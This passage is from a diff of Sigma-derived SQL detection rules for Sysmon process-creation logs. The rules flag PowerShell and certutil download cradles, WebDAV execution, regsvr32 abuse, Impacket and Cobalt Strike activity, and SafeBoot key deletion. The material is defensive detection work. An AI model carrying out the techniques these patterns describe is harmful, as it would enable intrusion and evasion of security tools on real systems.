This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], + "description": "Detects suspicious ways to download files or content using PowerShell", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Scripts or tools that download files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" + "filename": "proc_creation_win_powershell_download_cradles.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. 
As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "PowerShell Script Run in AppData", - "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", "status": "experimental", - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND 
ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.t1053.005", + "attack.s0111" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. 
Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_apt_slingshot.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", - "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "tags": [ "attack.execution", + "attack.t1047", 
"attack.lateral_movement", - "attack.t1072" + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Scheduled Task Name As GUID", + "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", + "description": "Detects creation of a scheduled task with a GUID like name", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Legitimate software naming their tasks as GUIDs" ], - "level": 
"high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((OriginalFileName = '3CXDesktopApp.exe' OR Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' 
ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_schtasks_guid_task_name.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": 
"2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "status": "test", + "description": "Detects a service binary running in a suspicious directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "Java Running with Remote Debugging", - "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "title": "Suspicious Download Via Certutil.EXE", + "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "status": "test", - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "author": 
"Florian Roth (Nextron Systems)", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_remote_debugging.yml" + "filename": "proc_creation_win_certutil_download.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image 
LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program 
Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", - "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "File Download Via Bitsadmin", + "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "status": "test", + "description": "Detects usage of bitsadmin downloading a file", + "author": "Michael Haag, FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." 
